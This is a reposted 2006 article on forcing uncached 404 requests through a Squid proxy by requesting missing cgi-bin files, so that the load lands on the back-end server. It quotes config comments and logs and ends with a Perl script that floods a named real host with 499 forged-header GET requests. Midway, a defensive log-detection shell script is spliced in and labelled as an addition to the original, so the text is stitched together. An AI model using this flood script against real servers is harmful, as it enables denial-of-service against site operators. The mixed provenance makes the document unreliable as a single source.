Attacking with HTTP Requests: The Cache Part
2006-12-6 15:44:24  Author: collected and compiled by 模板天下  Source: unknown
  

As Squid's configuration file shows, Squid also handles certain error responses specially and caches them as well.

#  TAG: negative_ttl    time-units
#       Time-to-Live (TTL) for failed requests.  Certain types of
#       failures (such as "connection refused" and "404 Not Found") are
#       negatively-cached for a configurable amount of time.  The
#       default is 5 minutes.  Note that this is different from
#       negative caching of DNS lookups.

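Is there a way to bypass the cache mechanism and the ACL restrictions and put this kind of 404 load on the server? The answer is yes: by requesting files under the cgi-bin directory.

By running the attack code we likewise attacked the back-end host, passing straight through the cache.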

root@coolc:~/squid-2.5.STABLE12# cat squid_access.log | awk '{print $4}' | uniq -c
499 TCP_MISS/404

root@coolc:~/squid-2.5.STABLE12# cat apache-access_log | wc -l
499

The following traces can be found in the logs.

172.16.10.1 - - [08/Apr/2006:16:33:50 -0800] "GET /cgi-bin/index.html1 HTTP/1.0" 404 298
172.16.10.1 - - [08/Apr/2006:16:33:50 -0800] "GET /cgi-bin/index.html1 HTTP/1.0" 404 298
172.16.10.1 - - [08/Apr/2006:16:33:50 -0800] "GET /cgi-bin/index.html1 HTTP/1.0" 404 298
172.16.10.1 - - [08/Apr/2006:16:33:50 -0800] "GET /cgi-bin/index.html1 HTTP/1.0" 404 298

In fact, the cause is that the default configuration gives the cgi-bin directory special treatment, which exempts requests for it from the cache.

#  TAG: hierarchy_stoplist
#       A list of words which, if found in a URL, cause the object to
#       be handled directly by this cache.  In other words, use this
#       to not query neighbor caches for certain objects.  You may
#       list this option multiple times. Note: never_direct overrides
#       this option.
#We recommend you to use at least the following line.
hierarchy_stoplist cgi-bin ?
#  TAG: no_cache
#       A list of ACL elements which, if matched, cause the request to
#       not be satisfied from the cache and the reply to not be cached.
#       In other words, use this to force certain objects to never be cached.
#
#       You must use the word 'DENY' to indicate the ACL names which should
#       NOT be cached.
#
#We recommend you to use the following two lines.
acl QUERY urlpath_regex cgi-bin \?
no_cache deny QUERY
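
The log check shown earlier (counting TCP_MISS/404 in field 4), extended into a per-client detector for 404 misses on URLs that the default QUERY ACL exempts from caching. This is an added example, not part of the original article; it assumes Squid's native access.log layout, and the function names, the threshold and the sample lines (host test.example) are constructed for illustration.

```shell
#!/bin/sh
# Added example: flag clients that send many 404 cache misses for URLs the
# default "acl QUERY urlpath_regex cgi-bin \?" rule keeps out of the cache.
# Assumed native access.log fields:
#   time elapsed client code/status bytes method URL ident hier/peer type

# flag_uncached_404 LOGFILE THRESHOLD
# Prints "client count" for every client at or above THRESHOLD.
flag_uncached_404() {
    awk -v limit="$2" '
        # $3 = client, $4 = result code/status, $7 = URL.
        # The regex approximates the QUERY ACL by matching the whole URL.
        $4 == "TCP_MISS/404" && $7 ~ /cgi-bin|\?/ { hits[$3]++ }
        END {
            for (c in hits)
                if (hits[c] >= limit) print c, hits[c]
        }
    ' "$1" | LC_ALL=C sort
}

# Constructed sample log: six uncached 404s from one client, one 404 that
# Squid answered from its negative cache, and two unrelated requests.
make_sample_log() {
    i=0
    while [ "$i" -lt 6 ]; do
        echo "1144542830.00$i 12 172.16.10.1 TCP_MISS/404 298 GET http://test.example/cgi-bin/index.html1 - DIRECT/10.0.0.2 text/html"
        i=$((i + 1))
    done
    echo "1144542831.000 3 172.16.10.7 TCP_NEGATIVE_HIT/404 298 GET http://test.example/missing.html - NONE/- text/html"
    echo "1144542832.000 9 172.16.10.7 TCP_MISS/404 298 GET http://test.example/cgi-bin/x - DIRECT/10.0.0.2 text/html"
    echo "1144542833.000 5 172.16.10.9 TCP_MISS/200 512 GET http://test.example/search?q=a - DIRECT/10.0.0.2 text/html"
}

# Usage: sh script.sh /path/to/access.log 100
if [ "$#" -eq 2 ]; then
    flag_uncached_404 "$1" "$2"
fi
```

A 404 served as TCP_NEGATIVE_HIT never reaches the origin server, so only TCP_MISS/404 entries on uncached paths are counted.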

Attack code:

use IO::Socket;
#$host=shift(@ARGV);
$i=1;
# 499 iterations, one request per connection
while ($i<500) {
    $i++;
    print "\n$i\n";
    $remote = IO::Socket::INET->new(Proto => "tcp",
        PeerPort => "80",
        #PeerAddr => "blog.xfocus.net"
        PeerAddr => "test.qq.com"
    ) || die("can't connect: $!");
    $remote->autoflush(1);
    # Request a nonexistent file under cgi-bin
    print $remote "GET /cgi-bin/index.html1 HTTP/1.1\r\n"
        . "Accept:image/gif image/x-xbitmap, image/jpeg,application/x-shockwave-flash\r\n"
        . "Referer: http://www.google.com\r\n"
        . "Accept-Language: zh-cn\r\n"
        . "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)\r\n"
        . "HOST:test.qq.com\n\n";
    #print <$remote>;
    close $remote;
    #sleep 1;
}
